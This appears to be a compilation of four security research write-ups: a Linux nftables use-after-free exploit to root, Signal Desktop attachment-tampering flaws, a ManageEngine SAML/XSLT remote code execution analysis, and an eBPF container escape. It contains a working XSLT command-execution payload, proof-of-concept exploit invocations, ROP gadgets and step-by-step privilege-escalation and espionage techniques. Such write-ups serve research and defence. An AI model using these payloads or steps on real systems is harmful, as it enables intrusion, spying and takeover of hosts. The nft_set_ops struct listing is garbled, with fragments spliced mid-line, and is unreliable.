// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/msg.h#L9

struct msg_msg {
        struct list_head           m_list;               /*     0    16 */
        long int                   m_type;               /*    16     8 */
        size_t                     m_ts;                 /*    24     8 */
        struct msg_msgseg *        next;                 /*    32     8 */
        void *                     security;             /*    40     8 */

        /* size: 48, cachelines: 1, members: 5 */
        /* last cacheline: 48 bytes */
};

Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.

It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the 

msg_msg
 header. This restriction discards the 
nft_lookup
 object as a candidate to apply this technique to as it is only possible to write the pointer either at offset 24 or offset 32 within the object. The ability of overwriting the 
msg_msg.m_ts
 member, which defines the size of the message, helps building a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that the 
m_ts
 member is not negative when interpreted as a signed long integer and heap addresses start with 
0xffff
, making it a negative long integer. 

Leaking an 
nft_set
 Pointer

Leaking a pointer to an 

nft_set
 object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:

1. Create a target set where the expressions will be bound to.

2. Create a rule with a lookup expression bound to the target set from step 1.

3. Create a set with an embedded 

nft_dynset
 expression bound to the target set. Since this is considered an invalid expression to be embedded to a set, the 
nft_dynset
 object will be freed but not removed from the target set bindings list, causing a UAF.

4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed 

nft_dynset
 object (via 
msgsnd()
 function). Tag all the messages at offset 24 so the one corrupted with the 
nft_set
 pointer can later be identified.

5. Remove the rule created, which will remove the entry of the 

nft_lookup
 expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target 
nft_set
 object where the original 
binding.list.prev
 member was (offset 72). Since the freed 
nft_dynset
 object was replaced by a System V message, the pointer to the 
nft_set
 will be written at offset 24 within the message data.

6. Use the userland 

msgrcv()
 function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the 
nft_set
.

Leaking a Kernel Function Pointer

Leaking a kernel pointer requires a bit more work than leaking a pointer to an 

nft_set
 object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done by using the partial object free primitive using 
fdtable
 object already described. The steps followed to leak a pointer to a kernel function are the following.

1. Increase the number of open file descriptors by calling 

dup()
 on 
stdout
 65 times.

2. Create a target set where the expressions will be bound to (different from the one used in the `

nft_set
` adress leak).

3. Create a set with an embedded 

nft_lookup
 expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the 
nft_lookup
 object will be freed but not removed from the target set bindings list, causing a UAF.

4. Spray 

fdtable
 objects in order to replace the freed 
nft_lookup
 from step 3.

5. Create a set with an embedded 

nft_dynset
 expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the 
nft_dynset
 object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the 
open_fds
 member of the 
fdtable
 object (allocated in step 4) that replaced the 
nft_lookup
 object.

6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed 

nft_dynset
 object (via 
msgsnd()
 function). Tag all the messages at offset 8 so the one corrupted can be identified.

7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the 

nft_dynset
 object, effectively causing a UAF to a part of a System V message.

8. Spray 

time_namespace
 objects in order to replace the partially freed System V message allocated in step 7. The reason for using the 
time_namespace
 objects is explained later.

9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use 

msgrcv()
 to read the data from it, which is overlapping with the newly allocated 
time_namespace
 object. The offset 40 of the data portion of the System V message corresponds to 
time_namespace.ns-&gt;ops
 member, which is a function table of functions defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel base image to this function it is possible to calculate the kernel image base address.

10. Clean-up the child processes used to spray the 

time_namespace
 objects.

time_namespace
 objects are interesting because they contain an 
ns_common
 structure embedded in them, which in turn contains an 
ops
 member that points to a function table with functions defined within the kernel core. The 
time_namespace
 structure definition is listed below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/time_namespace.h#L19

struct time_namespace {
        struct user_namespace *    user_ns;              /*     0     8 */
        struct ucounts *           ucounts;              /*     8     8 */
        struct ns_common           ns;                   /*    16    24 */
        struct timens_offsets      offsets;              /*    40    32 */
        /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */
        struct page *              vvar_page;            /*    72     8 */
        bool                       frozen_offsets;       /*    80     1 */

        /* size: 88, cachelines: 2, members: 6 */
        /* padding: 7 */
        /* last cacheline: 24 bytes */
};

At offset 16, the 

ns
 member is found. It is an 
ns_common
 structure, whose definition is the following.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/ns_common.h#L9

struct ns_common {
        atomic_long_t              stashed;              /*     0     8 */
        const struct proc_ns_operations  * ops;          /*     8     8 */
        unsigned int               inum;                 /*    16     4 */
        refcount_t                 count;                /*    20     4 */

        /* size: 24, cachelines: 1, members: 4 */
        /* last cacheline: 24 bytes */
};

At offset 8 within the 

ns_common
 structure the 
ops
 member is found. Therefore, 
time_namespace.ns-&gt;ops
 is at offset 24.

Spraying 

time_namespace
 objects can be done by calling the 
unshare()
 system call and providing the 
CLONE_NEWUSER
 and 
CLONE_NEWTIME
. In order to avoid altering the execution of the current process the 
unshare()
 executions can be done in separate processes created via 
fork()
.

clone_time_ns()
  |
  +- copy_time_ns()
    |
    +- create_new_namespaces()
      |
      +- unshare_nsproxy_namespaces()
        |
        +- unshare() syscall

The 

CLONE_NEWTIME
 flag is required because of a check in the function 
copy_time_ns()
 (listed below) and 
CLONE_NEWUSER
 is required to be able to use the 
CLONE_NEWTIME
 flag from an unprivileged user.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/kernel/time/namespace.c#L133

/**
 * copy_time_ns - Create timens_for_children from @old_ns
 * @flags:      Cloning flags
 * @user_ns:    User namespace which owns a new namespace.
 * @old_ns:     Namespace to clone
 *
 * If CLONE_NEWTIME specified in @flags, creates a new timens_for_children;
 * adds a refcounter to @old_ns otherwise.
 *
 * Return: timens_for_children namespace or ERR_PTR.
 */
struct time_namespace *copy_time_ns(unsigned long flags,
        struct user_namespace *user_ns, struct time_namespace *old_ns)
{
        if (!(flags & CLONE_NEWTIME))
                return get_time_ns(old_ns);

        return clone_time_ns(user_ns, old_ns);
}

RIP Control

Achieving RIP control is relatively easy with the partial object free primitive. This primitive can be used to partially free an 

nft_set
 object whose address is known and replace it with a fake 
nft_set
 object created with a System V message. The 
nft_set
 objects contain an 
ops
 member, which is a function table of type 
nft_set_ops
. Crafting this function table and triggering the right call will lead to RIP control.

The following is the definition of the 

nft_set_ops
 structure.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L389

struct nft_set_ops {
        bool                       (*lookup)(const struct net  *, const struct nft_set  *, const u32  *, const struct nft_set_ext  * *); /*     0     8 */
        bool                       (*update)(struct nft_set *, const u32  *, void * (*)(struct nft_set *, const struct nft_expr  *, struct nft_regs *), const struct nft_expr  *, struct nft_regs *, const struct nft_set_ext  * *); /*     8     8 */
        bool                       (*delete)(const struct nft_set  *, const u32  *); /*    16     8 */
        int                        (*insert)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *, struct nft_set_ext * *); /*    24     8 */
        void                       (*activate)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    32     8 */
        void *                     (*deactivate)(const struct net  *, const struct nft_set  *, cstimate *); /*    88     8 */
        int                        (*init)(const struct nft_set  *, const struct nft_set_desc  *, const struct nlattr  * const *); /*    96     8 */
        void                       (*destroy)(const struct nft_set  *); /*   onst struct nft_set_elem  *); /*    40     8 */
        bool                       (*flush)(const struct net  *, const struct nft_set  *, void *); /*    48     8 */
        void                       (*remove)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        void                       (*walk)(const struct nft_ctx  *, struct nft_set *, struct nft_set_iter *); /*    64     8 */
        void *                     (*get)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *, unsigned int); /*    72     8 */
        u64                        (*privsize)(const struct nlattr  * const *, const struct nft_set_desc  *); /*    80     8 */
        bool                       (*estimate)(const struct nft_set_desc  *, u32, struct nft_set_e104     8 */
        void                       (*gc_init)(const struct nft_set  *); /*   112     8 */
        unsigned int               elemsize;             /*   120     4 */

        /* size: 128, cachelines: 2, members: 16 */
        /* padding: 4 */
};

The 

delete
 member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria is matched. Using the 
nft
 command, a very simple one can be as follows:

nft add table inet test_dynset
nft add chain inet test_dynset my_input_chain { type filter hook input priority 0\;}
nft add set inet test_dynset my_set { type ipv4_addr\; }
nft add rule inet test_dynset my_input_chain ip saddr 127.0.0.1 delete @my_set { 127.0.0.1 }

The snippet above shows the creation of a table, a chain, and a set that contains elements of type 

ipv4_addr
 (i.e. IPv4 addresses). Then a rule is added, which deletes the item 
127.0.0.1
 from the set 
my_set
 when an incoming packet has the source IPv4 address 
127.0.0.1
. Whenever a packet matching that criteria is processed via nftables, the 
delete
 function pointer of the specified set is called.

Therefore, RIP control can be achieved with the following steps. Consider the target set to be the 

nft_set
 object whose address was already obtained.

  1. Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is 
    127.0.0.1
    .
  2. Partially free the 
    nft_set
     object from which the address was obtained.
  3. Spray System V messages containing a partially fake 
    nft_set
     object containing a fake 
    ops
     table, with a given value for the 
    ops-&gt;delete
     member.
  4. Trigger the call of 
    nft_set-&gt;ops-&gt;delete
     by locally sending a network packet to 
    127.0.0.1
    . This can be done by simply opening a TCP socket to 
    127.0.0.1
     at any port and issuing a 
    connect()
     call.

Escalating Privileges

Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.

A way of achieving this is as follows:

  1. Pivot the stack to a memory area under control. When the 
    delete
     function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of such registers can be controlled by adding an 
    immediate
     expression in the rule created to achieve RIP control.
  2. Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the 
    MODPROBE_PATH
     global variable, the stack is pivoted again to the end of the fake 
    nft_set
     used for RIP control.
  3. Build a ROP chain to overwrite the 
    MODPROBE_PATH
     global variable. Place it at the end of the 
    nft_set
     mentioned in step 2.
  4. Return to userland by using the KPTI trampoline.
  5. Drop to a privileged shell by leveraging the overwritten 
    MODPROBE_PATH
     global variable
    .

The stack pivot gadgets and ROP chain used can be found below.

// ROP gadget to pivot the stack to the nftables registers memory area

0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;


// ROP gadget to pivot the stack to the memory allocation holding the target nft_set

0xffffffff810b08f1: pop rsp ; ret ;

When the execution flow is redirected, the RSI register contains the address otf the nftables’ registers memory area. This memory can be controlled and thus is used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake 

nft_set
 object.

// ROP chain used to overwrite the MODPROBE_PATH global variable

0xffffffff8148606b: pop rax ; ret ;
0xffffffff8120f2fc: pop rdx ; ret ;
0xffffffff8132ab39: mov qword [rax], rdx ; ret ;

It is important to mention that the stack pivoting gadget that was used performs memory dereferences, requiring the address to be mapped. While experimentally the address was usually mapped, it negatively impacts the exploit reliability.

Wrapping Up

We hope you enjoyed this reading and could learn something new. If you are hungry for more make sure to check our other blog posts.

We wish y’all a great Christmas holidays and a happy new year! Here’s to a 2023 with more bugs, exploits, and write ups!

CVE-2023-24068 && CVE-2023-24069: Abusing Signal Desktop Client for fun and for Espionage

CVE-2023-24068 && CVE-2023-24069: Abusing Signal Desktop Client for fun and for Espionage #research #messanger #signal #desktop #CVE-2023-24068 #CVE-2023-24069

Original text by John Jackson

A flaw in how files are stored in Signal Desktop before 6.2.0 allows a threat actor to potentially obtain sensitive attachments sent in messages. Subsequently, a similar issue with Signal Desktop before 6.2.0 exists, allowing an an attacker to modify conversation attachments within the same directory. Client mechanisms fail to validate modifications of existing cached files, resulting in the ability to implement malicious code or overwrite pre-existing files and masquerade as pre-existing files. Local access is needed. 

Identification

While using signal, it was observed that the preview of an image was still visible even after having deleted the image because the image had been “replied” to. After looking through multiple files, the culprit directory was identified.

C:\Users\foo\AppData\Roaming\Signal\attachments.noindex\*\

To replicate, an image was sent in a group chat

The image was stored as a regular file in this directory, and the image can be recovered by modifying the extension and adding .png (on macOS and Linux you can see a preview of the native extensions so you don’t have to manually look at file properties)

This isn’t an edge case though, Signal is temporarily storing all of these attachments, unencrypted. Images were recovered from early 2022.

On this image in particular, you can see that the date is labeled as 10/26/2022.

Based on previous vulnerability research with Keybase, I then wondered if the image would properly get purged if I were to delete it. After deleting the file, it was indeed purged from the %AppData% folder. However, there was one small edge case: replying to the attachment. If someone were to reply to the attachment, the file would not be cleared from the cache, thus CVE number one: Cleartext Storage of Sensitive Information (CVE-2023-24069) was born. In general, the cache mishandling opens up a slew of issues. An adversary that can get their hands on these files wouldn’t even need to decrypt them and there’s no regular purging process, so undeleted files just sit unencrypted in this folder.

As displayed, the file was successfully recovered, even after being deleted (and basically the reason I went on this wild chase to being with).

When I discussed this vulnerability, several people had brought up the fact that Signal stores the decryption key on disk with the Desktop Client anyway. While true, this is just one less step to decrypt files, because…well you don’t have to decrypt them at all. The possible attack vector would be an adversary who already has local host access, looking to intercept your communications to recover secrets to pivot elsewhere in the environment or exploit external trust (such as passwords for third-party services).

The other possible risk could be foreign emissaries being wrongfully detained and forcefully searched. An adversary intelligence organization could pull the disk from a PC and take a snapshot, and recover all of these attachments, unencrypted. Again though, we return back to the fact that the Signal Desktop Client stores the encryption key on disk anyway (lol). Nonetheless, this vulnerability is another point of failure and makes it five times easier for unskilled adversaries to possibly recover sensitive information.

I wanted to ensure that this wasn’t specific to Windows, but being that the Signal Desktop Client has a shared codebase across operating systems, it probably wasn’t a Windows only vulnerability.

Navigating to the valid directory on Linux proved the same issues

~/.config/Signal/attachments.noindex/*/ 

Once again, the files were being stored in the cache, unencrypted. The same results were produced when the file was deleted but the attachment was previously quoted in conversation as well, confirming that the vulnerability exists across operating systems.

I still wasn’t satisfied though. I wanted to do something cooler than discuss a lack of encryption on files, and the ability to recover “deleted” files. After all, the people screaming about how this isn’t a vulnerability weren’t going to be appeased — as per usual.

Toying around with the client, I observed strange behavior. If I were to go in this /attachments.noindex/*/ folder, I could replace pre-existing sent attachments seamlessly. The client would automatically update it for me.

What you’re looking at is a set of three pictures. In picture number one, I identify the hacker pepe meme that I sent in a group chat, stored in a subdirectory within attachments.noindex — unencrypted, naturally. I named the german shepherd photo with the same value as the pepe meme, and overwrote it.

In picture number 2, you see that now when I try to download the pepe meme from the chat, it produces a picture of a german shepherd. Unfortunately that wasn’t enough to do anything. No one could see any updates to the attachment because everyone has a separate cache on their filesystem. HOWEVER. If you forward the attachment in another group chat or conversation, or the current one, Signal Desktop Client would now propagate the german shepherd rather than pepe which is what you thought you were forwarding.

Within itself, this is already its own vulnerability: CVE-2023-24068: Incorrect Resource Transfer Between Spheres. Amazing. Signal’s Desktop Client is not validating the existing file and it’s importing the new one without update any of the information or checking the file. Basically, it innately believes that the file is what it says it is. What we have here is the start of an attack chain.

Chaining CVE-2023-24069 with CVE-2023-24068 for fun and for Espionage

Up until this point we’ve established some key-operating knowledge:

  • Signal isn’t purging the cache correctly, resulting in unencrypted media files being stored.
  • When deleted, there are some cases in which the file is still able to be recovered.
  • Images can covertly be swapped and replaced, resulting in a new image propagating when forwarding, or a new image being produced when downloaded.

It was at this moment that I realized the Signal Desktop Client was likely storing ALL attachments in this way, including documents, and then I realized what an actual intelligence operator might do. Why would someone want to replace the file with something different when you can just backdoor the existing file?

First, for the sake of this proof of concept, imagine that we get access to the host machine of a high priority target, i.e. a prominent member of ‘x’ organization, who constantly forwards attachments from one signal group to another. Within one of their Signal groups we see a PDF file called “EndYearStatement”.

We have this fake PDF file. Now to backdoor it. Navigating to the attachments.noindex folder on the victim’s machine, we make a copy of the file. Malicious shellcode or components can now be introduced to the file. Copying the file name, the PDF is overwritten with our PDF that looks like the victim’s original file (but with our malicious code). It should be noted that you have to use the same file extension, you cannot swap the file out for a different extension.

The victim will still see the the same filename and preview — but the malware that we introduced has overwritten it.

If we were trying to abuse this vulnerability to spy on an adversary or gain access to their organization/group’s host machines, this process would be most ideal in the circumstance that our target is the type of person who naturally forwards attachments. We can wait for them to forward the new attachment to their group chats, and we can sit in our C2 and collect new beacons as we abuse a trusted relationship. It’s silent and covert, with no pretext required so none of the victims would be aware that the attachment was compromised. Not even the person who sent the original attachment to begin with.

For the sake of this proof of concept though, this process needs some assistance. We forward the attachment to a different group chat.

As you can see, the attachment did indeed retain its properties. However, when the group it was forwarded to downloads the attachment, they will be served the malicious one. It’s vital to backdoor the existing attachment, rather than send a new one to reduce suspicion.

Did it work? Uhhh nope it didn’t.

Joking. It worked. You can see that the one line PDF of “Dummy PDF file” includes our revisions:

Obviously, impact has now drastically escalated. Obtaining files is all good and well, but Sun Tzu once said:
“The supreme art of war is to subdue the enemy without fighting.”
Which is basically exactly what you can do if you backdoor all of a user’s attachments and wait for them to forward them. The process would be slow, but could easily be assisted with python and a compiler.



ManageEngine CVE-2022-47966 Technical Deep Dive

ManageEngine CVE-2022-47966 Technical Deep Dive #windows #research #xml #saml #CVE-2022-47966 #ManageEngine

Original text by James Horseman

Introduction

On January 10, 2023, ManageEngine released a security advisory for CVE-2022-47966 (discovered by Khoadha of Viettel Cyber Security) affecting a wide range of products. The vulnerability allows an attacker to gain remote code execution by issuing a HTTP POST request containing a malicious SAML response. This vulnerability is a result of  using an outdated version of Apache Santuario for XML signature validation.

Patch Analysis

We started our initial research by examining the differences between ServiceDesk Plus version 14003 and version 14004. By default, Service Desk is installed into

C:\Program Files\ManageEngine\ServiceDesk

. We installed both versions and extracted the jar files for comparison.

While there are many jar files that have been updated, we notice that there was a single jar file that has been completely changed.

libxmlsec

from Apache Santuario was updated from 1.4.1 to 2.2.3. Version 1.4.1 is over a decade old.

Jar differences

That is a large version jump, but if we start with the 1.4.2 release notes we find an interesting change:

  • Switch order of XML Signature validation steps. See Issue 44629.

Issue 44629 can be found here. It describes switching the order of XML signature validation steps and the security implications.

XML Signature Validation

XML signature validation is a complex beast, but it can be simplified down to the the following two steps:

  • Reference Validation – validate that each
<Reference>

element within the

<SignedInfo>

  • element has a valid digest value.
  • Signature Validation – cryptographically validate the 
<SignedInfo>

element. This assures that the

<SignedInfo>
  • element has not been tampered with.

While the official XML signature validation spec lists reference validation followed by signature validation, these two steps can be performed in any order. Since the reference validation step can involve processing attacker controlled XML

Transforms

, one should always perform the signature validation step first to ensure that the transforms came from a trusted source.

SAML Information Flow Refresher

Applications that support single sign-on typically use an authorization solution like SAML. When a user logs into a remote service, that service forwards the authentication request to the SAML Identity Provider. The SAML Identity Provider will then validate that the user credentials are correct and that they are authorized to access the specified service. The Identity Provider then returns a response to the client which is forwarded to the Service Provider.

The information flow of a login request via SAML can been seen below. One of the critical pieces is understanding that the information flow uses the client’s browser to relay all information between the Service Provider (SP) and the Identity Provider (IDP). In this attack, we send a request containing malicious SAML XML directly to the service provider’s Assertion Consumer (ACS) URL.

Information flow via https://cloudsundial.com/

The Vulnerability

Vulnerability Ingredient 1: SAML Validation Order

Understanding that SAML information flow allows an attacker to introduce or modify the SAML data in transit, it should now be clear why the Apache Santuario update to now perform signature validation to occur before reference validation was so important. This vulnerability will abuse the verification order as the first step in exploitation. See below for the diff between v1.4.1 and v.1.4.2.

1.4.1 vs 1.4.2

In v1.4.1, reference validation happened near the top of the code block with the call to

si.verify()

. In v1.4.2, the call to

si.verify()

was moved to the end of the function after the signature verification in

sa.verify(sigBytes).

Vulnerability Ingredient 2: XSLT Injection

Furthermore, each 

<Reference>

element can contain a

<Transform>

element responsible for describing how to modify an element before calculating its digest. Transforms allow for arbitrarily complex operations through the use of XSL Transformations (XSLT).

These transforms are executed in

src/org/apache/xml/security/signature/Reference.java

which is eventually called from

si.verify()

from above.

Reference transforms

XSLT is a turing-complete language and, in the ManageEngine environment, it is capable of executing arbitrary Java code. We can supply the following snippet to execute an arbitrary system command:

<ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
        <xsl:template match="/">
            <xsl:variable name="rtobject" select="rt:getRuntime()"/>
            <xsl:variable name="process" select="rt:exec($rtobject,'{command}')"/>
            <xsl:variable name="processString" select="ob:toString($process)"/>
            <xsl:value-of select="$processString"/>
        </xsl:template>
    </xsl:stylesheet>
</ds:Transform>

Abusing the order of SAML validation in Apache Santuario v1.4.1 and Java’s XSLT library providing access to run arbitrary Java classes, we can exploit this vulnerability in ManageEngine products to gain remote code execution.

SAML SSO Configuration

Security Assertion Markup Language (SAML) is a specification for sharing authentication and authorization information between an application or service provider and an identity provider. SAML with single sign on allows users to not have to worry about maintaining credentials for all of the apps they use and it gives IT administrators a centralized location for user management.

SAML uses XML signature verification to ensure the secure transfer of messages passed between service providers and identity providers.

We can enable SAML SSO by navigating to

Admin -> Users & Permissions -> SAML Single Sign On

where we can enter our identity provider information. Once properly configured, we will see “Log in with SAML Single Sign On” on the logon page:

Service Desk SAML logon

Proof of Concept

Our proof of concept can be found here.

After configuring SAML, the Assertion Consumer URL will now be active at

https://<hostname>:8080/SamlResponseServlet

and we can send our malicious SAML Response.

python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe

Since ServiceDesk runs as a service, there is no desktop to display the GUI for

notepad.exe

so we use ProcessExplorer to check the success of the exploit.

Notepad running

This proof of concept was also tested against Endpoint Central and we expect this POC to work unmodified on many of the ManageEngine products that share some of their codebase with ServiceDesk Plus or EndpointCentral.

Notably, the AD-related products (AdManager, etc) have additional checks on the SAML responses that must pass. They perform checks to verify that the SAML response looks like it came from the expected identity provider. Our POC has an optional

--issuer

argument to provide information to use for the

<Issuer>

element. Additionally, AD-related products have a different SAML logon endpoint URL that contains a guid. How to determine this information in an automated fashion is left as an exercise for the reader.

python3 CVE-2022-47966.py --url https://10.0.40.90:8443/samlLogin/<guid> --issuer https://sts.windows.net/<guid>/ --command notepad.exe

Summary

In summary, when Apache Santuario is <= v1.4.1, the vulnerability is trivially exploitable and made possible via several conditions:

  • Reference validation is performed before signature validation, allowing for the execution of malicious XSLT transforms.
  • Execution of XSLT transforms allows an attacker to execute arbitrary Java code.

This vulnerability is still exploitable even when Apache Santuario is between v1.4.1 and v2.2.3, which some of the affected ManageEngine products were using at the time, such as Password Manager Pro. The original research, Khoadha, documents further bypasses of validation in their research and is definitely worth a read.

Exploiting CVE-2021-3490 for Container Escapes

Exploiting CVE-2021-3490 for Container Escapes

Original text by Karsten König

Today, containers are the preferred approach to  deploy software or create build environments in CI/CD lifecycles. However, since the emergence of container solutions and environments like Docker and Kubernetes, security researchers have consistently found ways to escape from containers once they are compromised. Most attacks are based on configuration errors. But it is also possible to escalate privileges and escape to the container’s host system by exploiting vulnerabilities in the host’s operating system.

This blog shows how to modify an existing Linux kernel exploit in order to use it for container escapes and how the CrowdStrike Falcon® platform can help to prevent and hunt for similar threats.

Original Technique

Before we outline the modifications required to turn the exploit into a container escape, we first look at what the original exploit achieved.

Valentina Palmiotti published a full exploit for CVE-2021-3490 that can be used to locally escalate privileges to root on affected systems. The vulnerability was rooted in the eBPF subsystem of the Linux kernel and fixed in version 5.10.37. eBPF allows user space processes to load custom programs into the kernel and attach them to so-called events, thus giving user space the ability to observe kernel internals and, in specifically supported cases, to implement custom logic for networking, access control and other tasks. These eBPF programs have to pass a verifier before being loaded, which is supposed to guarantee that the code does not contain loops and does not write to memory outside of its dedicated area. This step should ensure that eBPF programs terminate and are not able to manipulate kernel memory, which would potentially allow attackers to escalate privileges. However, this verifier contained several vulnerabilities in the past. CVE-2021-3490  is one of them and can ultimately be used to achieve a kernel read and write primitive.

Building on the kernel read primitive, it is possible to leak a kernel pointer. eBPF programs can communicate with processes running in user space using so-called “eBPF maps.”  Every eBPF map is described by a 

struct bpf_map
 object, which contains a  field 
ops
 pointing to a 
struct bpf_map_ops
. That struct contains several function pointers for working with the eBPF map. eBPF maps come in different kinds with different definitions for 
ops
 stored at known offsets. For array maps, 
ops
 will be set to point to the kernel symbol 
array_map_ops
. The exploit will leak that address and then use it as a starting point to further scan the kernel’s memory space and read pointers from the kernel’s symbol table.

The kernel exports pointers to certain variables, objects and functions in a symbol table to make them accessible by kernel modules. This table is called 

ksymtab
. In order to look up the actual name of a stored symbol address, a second table, called 
kstrtab
, is utilized. A pointer to the string in 
kstrtab
 that contains the name is stored as part of every 
ksymtab
 entry, right after the pointer to the symbol itself. To find the address of a kernel symbol, the exploit first reads memory from kernel space starting at the leaked address of 
array_map_ops
 using the arbitrary read primitive. This is done until the string containing the symbol name of interest is found in 
kstrtab
.

Because 

kstrtab
 is mapped after 
ksymtab
, the previously read memory region should contain the pointer to the string in 
kstrtab
. Therefore, the exploit then proceeds to search for that pointer, and the pointer to the actual symbol is stored right before it.

One clarification has to be made about the above code excerpt: There are two different formats of 

ksymtab
. Which one is used is decided when the Linux kernel is built from source by the configuration parameter 
HAVE_ARCH_PREL32_RELOCATIONS
. In one case, the actual addresses of the symbols and 
kstrtab
 entries are stored. However, in many kernel builds it does not actually contain pointers but offsets such that the address where the offset is stored plus the offset itself is the symbol’s address or the string’s address in 
kstrtab
.

Nevertheless, using this technique, the exploit identifies the address of 

init_pid_ns
. This object is a 
struct pid_namespace
 and describes the default process ID namespace new processes are started in.

Namespaces have become a  fundamental feature of Linux and are crucial to the idea of container environments. They allow separating system resources between different processes such that one process can observe a completely different set than others. For example, mount namespaces control observable filesystem mount points such that two processes can have different views of the filesystem. This allows a container’s filesystem to have a different root directory than the host. Process ID namespaces on the other side give processes a completely unique process tree. The first process in a process ID namespace always has the identifier (PID) 1. It is considered as the 

init
 process that initializes the operating system and from which new processes originate. Therefore, if this process is stopped, all other processes in the particular process ID namespace are stopped as well.

By identifying 

init_pid_ns
, it is possible to enumerate all 
struct task
 objects of the processes running in that namespace as those are stored in a traversable radix tree in the field 
idr
. The exploit identifies the correct 
task
 object by its PID. Those 
task
 objects store a pointer to a 
struct cred
 object that contains the UID and GID (user and group identifier) associated with the process and therefore holds the granted permissions. By overwriting the 
cred
 object of a process, it is possible to escalate privileges by setting the UID and GID to 0, which is associated with the 
root
 user.

However, this approach does not work if a container was compromised and the attacker’s goal is to escape into the container’s host environment.

Why This Doesn’t Work in Containers

Linux kernel exploits are an alternative method to escape container environments to the host in case no mistakes in the container configuration were made. They can be used because containers share the host’s kernel and therefore its vulnerabilities, regardless of the Linux distribution the container is based on. However, exploit developers have to pay attention to some obstacles compared to privilege escalation outside of container environments.

First, container solutions are able to restrict the capabilities of processes running inside a container. For example, the capability 

SYS_ADMIN
 is normally not granted to processes running in containers, which can therefore not mount file systems or execute various other privileged actions. Moreover, it is possible to restrict the set of syscalls a userland process can call by utilizing 
seccomp
. For example, in the default configuration of Docker, an exploit would not be able to use eBPF at all. Nevertheless, in the default Kubernetes configuration, 
seccomp
 does not restrict the available syscalls at all. For the remainder of this post, though, we will assume that the container is configured such that eBPF could be used by userland processes.

Second, on a more practical note, the techniques of the original exploit described above will not work out-of-the-box. As already described, containers rely heavily on namespaces. Because containers typically have their own associated process ID namespace, it is not as straightforward to identify the exploit process running in the container by its PID, because, for example, the exploit may have PID 42 from the container’s perspective but PID 1337 from the host’s perspective. However, the parent namespace can still observe all processes running in child namespaces. Therefore, those processes have a PID in both parent and child namespace. Ultimately, the initial process ID namespace described by 

init_pid_ns
 can observe any process running on a particular system. Nevertheless, even if we identify the 
task
 structure of our exploit process within a container, overwriting its 
cred
 object as described previously will simply elevate privileges within the container but not allow container escape.

Changes for Container Escapes

It is possible to modify the exploit so that a container escape is conducted and privileges are escalated to 

root
 on the host. To easily find the exploit process in a container, an exploit can search for the symbol 
current_task
 and 
pcpu_base_addr
 symbols in 
ksymtab
current_task
 stores the offset to the running process’s 
task
 object based on the address stored in 
pcpu_base_addr
. Because 
pcpu_base_addr
 is unique per CPU core, the process must be pinned before on one core using the 
sched_setaffinity()
 system call
.

Using this technique it is possible to identify the correct 

task
 object without traversing the radix tree of all processes stored in 
init_pid_ns
.

This allows the attacker to overwrite the correct 

cred
 object and therefore obtain 
root
privileges. Due to the usage of namespaces, the observable file system is still that of the container, though. Nevertheless, it is possible to overcome that obstacle as well. The 
task
object contains a pointer to a 
struct fs_struct
 object. This object contains information about the observable file system, i.e.,which directory is considered as the processes’ file system root. Using the leaked pointer to 
init_pid_ns
, it is possible to traverse the process radix tree and identify the host’s 
init
 process, which has PID 1. Next, it is possible to retrieve the 
fs
pointer from this process’s 
task
 object. Lastly, while overwriting the 
cred
 object of the exploit process, the 
fs
 pointer must be overwritten as well using the 
init
 process’s 
fs
 pointer. The exploit process can then observe the complete host file system.

One last addition must be made. As stated above, containers normally have limited capabilities. Capabilities are used to restrict the permissions of processes running in containers. To obtain full privileges, the exploit also has to overwrite the capabilities mask of the exploit’s process in the 

task
 object. How exactly the values must be set to obtain full capabilities without any restrictions can be investigated in the definition of the 
init
 process’ credentials
.

The technique described in this blog to identify the 

task
 object of the exploit’s process only works on Linux kernel version before 5.15, as 
pcpu_base_addr
 is no longer exported as a symbol to 
ksymtab
. Nevertheless, alternative methods exist to find the correct 
task
 object, e.g., by traversing the radix tree of all processes from 
init_pid_ns
